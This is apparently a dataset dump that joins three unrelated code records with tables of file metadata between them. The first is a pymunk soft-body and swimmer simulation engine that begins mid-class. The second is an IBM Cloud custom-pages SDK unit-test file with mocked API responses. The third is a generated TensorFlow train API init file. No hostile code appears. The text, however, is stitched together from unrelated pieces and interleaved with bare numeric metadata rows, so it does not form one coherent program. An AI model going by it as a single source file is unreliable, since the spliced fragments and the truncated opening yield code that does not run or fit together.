if param is None:
self.n_box, self.k, self.damping, self.init_p = [None] * 4
else:
self.n_box, self.k, self.damping, self.init_p = param
self.n_box = int(self.n_box)
if self.n_box is None:
self.n_box = rand_int(self.num_box_range[0], self.num_box_range[1])
if self.k is None:
self.k = rand_float(self.k_range[0], self.k_range[1])
if self.damping is None:
self.damping = self.k / 20.
if self.init_p is None:
self.init_p = self.sample_init_p()
# print('Env Swim param: n_box=%d, k=%.4f, damping=%.4f' % (self.n_box, self.k, self.damping))
self.space = pymunk.Space()
self.space.gravity = (0., 0.)
self.add_masses()
self.add_rels()
self.calc_outside()
self.state_prv = None
# print(self.init_p)
# print(self.outside)
def add_masses(self):
inertia = pymunk.moment_for_circle(self.mass, 0, self.radius, (0, 0))
self.balls = []
for i in range(self.n_box):
x, y, t = self.init_p[i]
l = self.side_length / 2.
for j in range(4):
body = pymunk.Body(self.mass, inertia)
if j == 0:
body.position = Vec2d(x - l, y - l)
elif j == 1:
body.position = Vec2d(x - l, y + l)
elif j == 2:
body.position = Vec2d(x + l, y - l)
else:
body.position = Vec2d(x + l, y + l)
# shape = pymunk.Circle(body, self.radius, (0, 0))
# self.space.add(body, shape)
self.space.add(body)
self.balls.append(body)
def add_rels(self):
for i in range(self.n_box):
if self.init_p[i, 2] <= 1:
# if the box is soft
# side
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 1], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 3], self.balls[i * 4 + 1], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 3], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
# cross
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 3], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 1], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
else:
# if the box is rigid
# side
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 1], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 3], self.balls[i * 4 + 1], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 3], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
# cross
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 3], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 1], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
# add PinJoint to adjacent boxes
for i in range(self.n_box):
for j in range(i):
for ii in range(4):
for jj in range(4):
x, y = i * 4 + ii, j * 4 + jj
if calc_dis(self.balls[x].position, self.balls[y].position) < 1e-4:
c = pymunk.PinJoint(self.balls[x], self.balls[y], (0, 0), (0, 0))
self.space.add(c)
def add_force(self):
for i in range(self.n_box):
if self.init_p[i, 2] == 0:
# if the current box has actuator
for j in range(4):
x, y = i * 4 + j, i * 4 + (3 - j)
direct = np.array([
self.balls[y].position[0] - self.balls[x].position[0],
self.balls[y].position[1] - self.balls[x].position[1]])
direct /= norm(direct)
force = direct * self.action[i]
self.balls[x].apply_force_at_local_point(
force=(force[0], force[1]), point=(0, 0))
for i in range(self.n_box):
s = np.zeros((4, 4))
for j in range(4):
idx = i * 4 + j
s[j, 0] = self.balls[idx].position[0]
s[j, 1] = self.balls[idx].position[1]
s[j, 2] = self.balls[idx].velocity[0]
s[j, 3] = self.balls[idx].velocity[1]
for j in range(4):
if j == 0:
a, b = 0, 1
elif j == 1:
a, b = 1, 3
elif j == 2:
a, b = 3, 2
else:
a, b = 2, 0
if self.outside[i, j] == 1 and self.init_p[i, 2] == 0 and self.action[i] < 0:
direct = s[b, :2] - s[a, :2]
dist = norm(direct)
direct /= dist
direct = np.array([-direct[1], direct[0]])
v_scale = np.dot(s[a, 2:], direct)
if v_scale > 0.:
f = - v_scale ** 2 * direct * dist * 50.
self.balls[i * 4 + a].apply_force_at_local_point(
force=(f[0], f[1]), point=(0, 0))
v_scale = np.dot(s[b, 2:], direct)
if v_scale > 0.:
f = - v_scale ** 2 * direct * dist * 50.
self.balls[i * 4 + b].apply_force_at_local_point(
force=(f[0], f[1]), point=(0, 0))
def get_param(self):
return self.n_box, self.k, self.damping, self.init_p
def get_state(self):
state = np.zeros((self.n_box, 16))
for i in range(self.n_box):
for j in range(4):
ball = self.balls[i * 4 + j]
state[i, j * 2: (j + 1) * 2] = \
np.array([ball.position[0], ball.position[1]])
state[i, 8 + j * 2: 8 + (j + 1) * 2] = \
np.array([ball.velocity[0], ball.velocity[1]])
state_acc = state.copy()
count = np.zeros((self.n_box, 1, 8))
for i in range(self.n_box):
for j in range(self.n_box):
if i == j:
count[i, :, :] += 1
continue
delta = self.init_p[i, :2] - self.init_p[j, :2]
assert (np.abs(delta) > 0).any()
if (np.abs(delta) > 1).any():
# no contact
continue
if np.sum(np.abs(delta)) == 1:
# contact at a side
if delta[0] == 1:
x0, y0, x1, y1 = 1, 3, 0, 2
elif delta[0] == -1:
x0, y0, x1, y1 = 3, 1, 2, 0
elif delta[1] == 1:
x0, y0, x1, y1 = 0, 1, 2, 3
elif delta[1] == -1:
x0, y0, x1, y1 = 1, 0, 3, 2
x0 *= 2
y0 *= 2
x1 *= 2
y1 *= 2
count[i, :, x0:x0 + 2] += 1
count[i, :, x1:x1 + 2] += 1
state_acc[i, x0:x0 + 2] += state[j, y0:y0 + 2]
state_acc[i, x0 + 8:x0 + 10] += state[j, y0 + 8:y0 + 10]
state_acc[i, x1:x1 + 2] += state[j, y1:y1 + 2]
state_acc[i, x1 + 8:x1 + 10] += state[j, y1 + 8:y1 + 10]
elif np.sum(np.abs(delta)) == 2:
# contact at a corner
if delta[0] == 1 and delta[1] == 1:
x, y = 0, 3
elif delta[0] == 1 and delta[1] == -1:
x, y = 1, 2
elif delta[0] == -1 and delta[1] == 1:
x, y = 2, 1
elif delta[0] == -1 and delta[1] == -1:
x, y = 3, 0
x *= 2
y *= 2
count[i, :, x:x + 2] += 1
state_acc[i, x:x + 2] += state[j, y:y + 2]
state_acc[i, x + 8:x + 10] += state[j, y + 8:y + 10]
state_acc = state_acc.reshape(self.n_box, 2, 8) / count
state_acc = state_acc.reshape(self.n_box, 16)
vel_dim = self.state_dim // 2
if self.state_prv is None:
state_acc[:, vel_dim:] = 0
else:
state_acc[:, vel_dim:] = (state_acc[:, :vel_dim] - self.state_prv[:, :vel_dim]) / self.dt
return state_acc
def step(self):
self.add_force()
self.state_prv = self.get_state()
self.space.step(self.dt)
def render(self, states, actions=None, param=None, act_scale=10.,
video=True, image=False, path=None, lim=(-6., 6., -7., 5.),
states_gt=None, count_down=False, gt_border=False):
if video:
video_path = path + '.avi'
fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')
print('Save video as %s' % video_path)
out = cv2.VideoWriter(video_path, fourcc, 25, (640, 480))
if image:
image_path = path + '_img'
print('Save images to %s' % image_path)
os.system('mkdir -p %s' % image_path)
c = ['royalblue', 'tomato', 'limegreen', 'orange', 'violet', 'chocolate', 'lightsteelblue']
time_step = states.shape[0]
n_ball = states.shape[1] * 4
states = states[:, :, :8].reshape((time_step, n_ball, 2))
if states_gt is not None:
states_gt = states_gt[:, :, :8].reshape((time_step, n_ball, 2))
init_p = param[3]
for i in range(time_step):
fig, ax = plt.subplots(1)
plt.xlim(lim[0], lim[1])
plt.ylim(lim[2], lim[3])
plt.axis('off')
polys = []
polys_color = []
for j in range(self.n_box):
poly = Polygon(np.array([
states[i, j * 4, :2], states[i, j * 4 + 1, :2],
states[i, j * 4 + 3, :2], states[i, j * 4 + 2, :2]]), True)
polys.append(poly)
if init_p[j, 2] == 0:
if actions is not None:
act = actions[i, j]
else:
act = 0.
r = (act + act_scale) / (act_scale * 2)
if np.abs(r - 0.5) < 1e-4:
c = 'cornflowerblue'
else:
c = to_rgba('tomato')[:3] * r + to_rgba('limegreen')[:3] * (1. - r)
c = np.clip(c, 0., 1.)
polys_color.append(c)
elif init_p[j, 2] == 1:
polys_color.append('lightsteelblue')
elif init_p[j, 2] == 2:
polys_color.append('dimgray')
elif init_p[j, 2] == 3:
polys_color.append('lightsteelblue')
else:
raise AssertionError("Unknown box type %f" % init_p[j, 2])
if states_gt is not None:
polys_gt = []
for j in range(self.n_box):
poly = Polygon(np.array([
states_gt[i, j * 4, :2], states_gt[i, j * 4 + 1, :2],
states_gt[i, j * 4 + 3, :2], states_gt[i, j * 4 + 2, :2]]), True)
polys_gt.append(poly)
if gt_border:
pc_polys_gt = PatchCollection(
polys_gt, facecolor=(0., 0., 0., 0.), edgecolor='orangered', lw=1.)
else:
pc_polys_gt = PatchCollection(
polys_gt, facecolor=polys_color, linewidth=0, alpha=0.5)
pc_polys = PatchCollection(polys, facecolor=polys_color, linewidth=0, alpha=1.)
ax.add_collection(pc_polys)
if states_gt is not None:
ax.add_collection(pc_polys_gt)
ax.set_aspect('equal')
font = {'family': 'serif',
'color': 'darkred',
'weight': 'normal',
'size': 16}
if count_down:
plt.text(-7, 4, 'CountDown: %d' % (time_step - i - 1), fontdict=font)
plt.tight_layout()
if video:
fig.canvas.draw()
frame = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
frame = frame.reshape(fig.canvas.get_width_height()[::-1] + (3,))
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
out.write(frame)
if i == time_step - 1:
for _ in range(10):
out.write(frame)
if image:
plt.savefig(os.path.join(image_path, 'fig_%s.png' % i), bbox_inches='tight')
plt.close()
if video:
out.release()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--env', default='')
args = parser.parse_args()
os.system('mkdir -p test')
if args.env == 'Rope':
dt = 1. / 50.
state_dim = 4
action_dim = 1
param_dim = 5 # n_ball, init_x, k, damping, gravity
act_scale = 2.
ret_scale = 1.
engine = RopeEngine(dt, state_dim, action_dim, param_dim)
time_step = 300
states = np.zeros((time_step, engine.n_ball, engine.state_dim))
actions = np.zeros((time_step, engine.action_dim))
for i in range(time_step):
states[i] = engine.get_state()
act = (np.random.rand() * 2. - 1.) * act_scale - states[i, 0, 0] * ret_scale
engine.set_action(np.array([act]))
engine.step()
actions[i] = engine.get_action()
engine.render(states, None, engine.get_param(), video=True, image=True, path='test/Rope')
elif args.env == 'Soft':
dt = 1. / 50.
state_dim = 16
action_dim = 1
param_dim = 4 # n_box, k, damping, init_p
act_scale = 800.
act_delta = 200.
engine = SoftEngine(dt, state_dim, action_dim, param_dim)
engine.init()
time_step = 100
states = np.zeros((time_step, engine.n_box, state_dim))
actions = np.zeros((time_step, engine.n_box, action_dim))
for i in range(time_step):
states[i] = engine.get_state()
box_type = engine.init_p[:, 2]
for j in range(engine.n_box):
if box_type[j] == 0:
# if this is a actuated box
if i == 0:
actions[i, j] = rand_float(-act_delta, act_delta)
else:
actions[i, j] = actions[i - 1, j] + rand_float(-act_delta, act_delta)
actions[i, j] = np.clip(actions[i, j], -act_scale, act_scale)
elif box_type[j] >= 1:
# if this is a soft box without actuation OR a rigid box
actions[i, j] = 0
engine.set_action(actions[i])
engine.step()
assert np.array_equal(actions[i], engine.get_action())
engine.render(states, None, engine.get_param(), act_scale=act_scale, video=True, image=True, path='test/Soft',
count_down=False)
elif args.env == 'Swim':
dt = 1. / 50.
state_dim = 16
action_dim = 1
param_dim = 4 # n_box, k, damping, init_p
act_scale = 600.
act_delta = 300.
engine = SwimEngine(dt, state_dim, action_dim, param_dim)
tag = ['rand', 'forward', 'rotate'][0]
for epoch in range(5):
for num in [8]:
init_p = sample_init_p_flight(num, epoch, True, train=False)
engine.init(param=[num, None, None, init_p])
'''
init_p = get_init_p_fish_8()
engine.init(param=[8, None, None, init_p])
'''
time_step = 100
states = np.zeros((time_step, engine.n_box, state_dim))
actions = np.zeros((time_step, engine.n_box, action_dim))
actions_param = np.zeros((engine.n_box, 3))
sin_motion = np.random.rand() < 0.5
for i in range(time_step):
states[i] = engine.get_state()
box_type = engine.init_p[:, 2]
for j in range(engine.n_box):
if box_type[j] == 0:
# if this is a actuated box
if i == 0:
actions_param[j] = np.array(
[rand_float(0., 1.), rand_float(0.5, 4.), rand_float(0, np.pi * 2)])
if actions_param[j, 0] < 0.5 and sin_motion == 0:
if i == 0:
actions[i, j] = rand_float(-act_delta, act_delta)
else:
lo = max(actions[i - 1, j] - act_delta, -act_scale)
hi = min(actions[i - 1, j] + act_delta, act_scale)
actions[i, j] = rand_float(lo, hi)
actions[i, j] = np.clip(actions[i, j], -act_scale, act_scale)
else:
actions[i, j] = np.sin(i / actions_param[j, 1] + actions_param[j, 2]) * \
rand_float(act_scale / 2., act_scale)
if tag == 'rotate':
if j < engine.n_box // 2:
if actions[i, j] < 0: actions[i, j] = 0
else:
if actions[i, j] > 0: actions[i, j] = 0
elif box_type[j] >= 1:
# if this is a soft box without actuation OR a rigid box
actions[i, j] = 0
engine.set_action(actions[i])
engine.step()
assert np.array_equal(actions[i], engine.get_action())
os.system('mkdir -p test/swim_{}_train'.format(tag))
engine.render(
states, None, engine.get_param(), act_scale=act_scale, video=True, image=True,
path='test/swim_{}_train/Swim_{}_{}'.format(tag, num, epoch), count_down=False)
| 37.08084
| 118
| 0.452673
| 7,954
| 58,254
| 3.182047
| 0.045386
| 0.03062
| 0.008416
| 0.0226
| 0.832951
| 0.810036
| 0.786764
| 0.758198
| 0.744172
| 0.73228
| 0
| 0.05094
| 0.404882
| 58,254
| 1,570
| 119
| 37.104459
| 0.679128
| 0.034298
| 0
| 0.725846
| 0
| 0
| 0.016891
| 0.000519
| 0
| 0
| 0
| 0
| 0.008258
| 1
| 0.04294
| false
| 0.004955
| 0.009083
| 0.008258
| 0.073493
| 0.006606
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d423d0508653587ed90d8b63f87105fc4668456
| 18,755
|
py
|
Python
|
test/unit/test_custom_pages_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_custom_pages_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_custom_pages_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | 1
|
2020-07-30T10:39:28.000Z
|
2020-07-30T10:39:28.000Z
|
# -*- coding: utf-8 -*-
# (C) Copyright IBM Corp. 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime, timezone
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
import inspect
import json
import pytest
import responses
from ibm_cloud_networking_services.custom_pages_v1 import *
crn = 'testString'
zone_identifier = 'testString'
service = CustomPagesV1(
authenticator=NoAuthAuthenticator(),
crn=crn,
zone_identifier=zone_identifier
)
base_url = 'https://api.cis.cloud.ibm.com'
service.set_service_url(base_url)
##############################################################################
# Start of Service: CustomPages
##############################################################################
# region
#-----------------------------------------------------------------------------
# Test Class for list_instance_custom_pages
#-----------------------------------------------------------------------------
class TestListInstanceCustomPages():
#--------------------------------------------------------
# list_instance_custom_pages()
#--------------------------------------------------------
@responses.activate
def test_list_instance_custom_pages_all_params(self):
# Set up mock
url = base_url + '/v1/testString/custom_pages'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": [{"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}], "result_info": {"page": 1, "per_page": 20, "total_pages": 1, "count": 10, "total_count": 10}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.list_instance_custom_pages()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_list_instance_custom_pages_required_params()
#--------------------------------------------------------
@responses.activate
def test_list_instance_custom_pages_required_params(self):
# Set up mock
url = base_url + '/v1/testString/custom_pages'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": [{"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}], "result_info": {"page": 1, "per_page": 20, "total_pages": 1, "count": 10, "total_count": 10}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.list_instance_custom_pages()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_instance_custom_page
#-----------------------------------------------------------------------------
class TestGetInstanceCustomPage():
#--------------------------------------------------------
# get_instance_custom_page()
#--------------------------------------------------------
@responses.activate
def test_get_instance_custom_page_all_params(self):
# Set up mock
url = base_url + '/v1/testString/custom_pages/basic_challenge'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
page_identifier = 'basic_challenge'
# Invoke method
response = service.get_instance_custom_page(
page_identifier
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_get_instance_custom_page_required_params()
#--------------------------------------------------------
@responses.activate
def test_get_instance_custom_page_required_params(self):
# Set up mock
url = base_url + '/v1/testString/custom_pages/basic_challenge'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
page_identifier = 'basic_challenge'
# Invoke method
response = service.get_instance_custom_page(
page_identifier
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for update_instance_custom_page
#-----------------------------------------------------------------------------
class TestUpdateInstanceCustomPage():
#--------------------------------------------------------
# update_instance_custom_page()
#--------------------------------------------------------
@responses.activate
def test_update_instance_custom_page_all_params(self):
# Set up mock
url = base_url + '/v1/testString/custom_pages/basic_challenge'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
page_identifier = 'basic_challenge'
url = 'https://www.example.com/basic_challenge_error.html'
state = 'customized'
# Invoke method
response = service.update_instance_custom_page(
page_identifier,
url=url,
state=state,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['url'] == url
assert req_body['state'] == state
#--------------------------------------------------------
# test_update_instance_custom_page_required_params()
#--------------------------------------------------------
@responses.activate
def test_update_instance_custom_page_required_params(self):
# Set up mock
url = base_url + '/v1/testString/custom_pages/basic_challenge'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
page_identifier = 'basic_challenge'
# Invoke method
response = service.update_instance_custom_page(
page_identifier
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for list_zone_custom_pages
#-----------------------------------------------------------------------------
class TestListZoneCustomPages():
#--------------------------------------------------------
# list_zone_custom_pages()
#--------------------------------------------------------
@responses.activate
def test_list_zone_custom_pages_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_pages'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": [{"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}], "result_info": {"page": 1, "per_page": 20, "total_pages": 1, "count": 10, "total_count": 10}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.list_zone_custom_pages()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_list_zone_custom_pages_required_params()
#--------------------------------------------------------
@responses.activate
def test_list_zone_custom_pages_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_pages'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": [{"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}], "result_info": {"page": 1, "per_page": 20, "total_pages": 1, "count": 10, "total_count": 10}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = service.list_zone_custom_pages()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_zone_custom_page
#-----------------------------------------------------------------------------
class TestGetZoneCustomPage():
#--------------------------------------------------------
# get_zone_custom_page()
#--------------------------------------------------------
@responses.activate
def test_get_zone_custom_page_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_pages/basic_challenge'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
page_identifier = 'basic_challenge'
# Invoke method
response = service.get_zone_custom_page(
page_identifier
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#--------------------------------------------------------
# test_get_zone_custom_page_required_params()
#--------------------------------------------------------
@responses.activate
def test_get_zone_custom_page_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_pages/basic_challenge'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
page_identifier = 'basic_challenge'
# Invoke method
response = service.get_zone_custom_page(
page_identifier
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for update_zone_custom_page
#-----------------------------------------------------------------------------
class TestUpdateZoneCustomPage():
#--------------------------------------------------------
# update_zone_custom_page()
#--------------------------------------------------------
@responses.activate
def test_update_zone_custom_page_all_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_pages/basic_challenge'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
page_identifier = 'basic_challenge'
url = 'https://www.example.com/basic_challenge_error.html'
state = 'customized'
# Invoke method
response = service.update_zone_custom_page(
page_identifier,
url=url,
state=state,
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['url'] == url
assert req_body['state'] == state
#--------------------------------------------------------
# test_update_zone_custom_page_required_params()
#--------------------------------------------------------
@responses.activate
def test_update_zone_custom_page_required_params(self):
# Set up mock
url = base_url + '/v1/testString/zones/testString/custom_pages/basic_challenge'
mock_response = '{"success": true, "errors": [["errors"]], "messages": [["messages"]], "result": {"id": "basic_challenge", "description": "Basic Challenge", "required_tokens": ["::CAPTCHA_BOX::"], "preview_target": "block:basic-sec-captcha", "created_on": "2019-01-01T12:00:00", "modified_on": "2019-01-01T12:00:00", "url": "https://www.example.com/basic_challenge_error.html", "state": "customized"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
page_identifier = 'basic_challenge'
# Invoke method
response = service.update_zone_custom_page(
page_identifier
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# endregion
##############################################################################
# End of Service: CustomPages
##############################################################################
| 46.8875
| 506
| 0.539803
| 1,818
| 18,755
| 5.336084
| 0.10231
| 0.07793
| 0.019792
| 0.032162
| 0.8729
| 0.8729
| 0.8729
| 0.862798
| 0.8428
| 0.807752
| 0
| 0.032161
| 0.205865
| 18,755
| 399
| 507
| 47.005013
| 0.619176
| 0.23903
| 0
| 0.794118
| 0
| 0.058824
| 0.437355
| 0.100723
| 0
| 0
| 0
| 0
| 0.137255
| 1
| 0.058824
| false
| 0
| 0.034314
| 0
| 0.122549
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d67917db20d3abe76dc371e2111f0d0842ca2a7
| 8,606
|
py
|
Python
|
venv/Lib/site-packages/tensorflow_core/_api/v2/compat/v1/train/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/_api/v2/compat/v1/train/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/_api/v2/compat/v1/train/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Support for training models.
See the [Training](https://tensorflow.org/api_guides/python/train) guide.
"""
from __future__ import print_function as _print_function
import sys as _sys
from . import experimental
from . import queue_runner
from tensorflow.python import ServerDef
from tensorflow.python.framework.graph_io import write_graph
from tensorflow.python.ops.gen_sdca_ops import sdca_fprint
from tensorflow.python.ops.gen_sdca_ops import sdca_optimizer
from tensorflow.python.ops.gen_sdca_ops import sdca_shrink_l1
from tensorflow.python.pywrap_tensorflow_internal import NewCheckpointReader
from tensorflow.python.pywrap_tensorflow_internal import do_quantize_training_on_graphdef
from tensorflow.python.summary.summary_iterator import summary_iterator
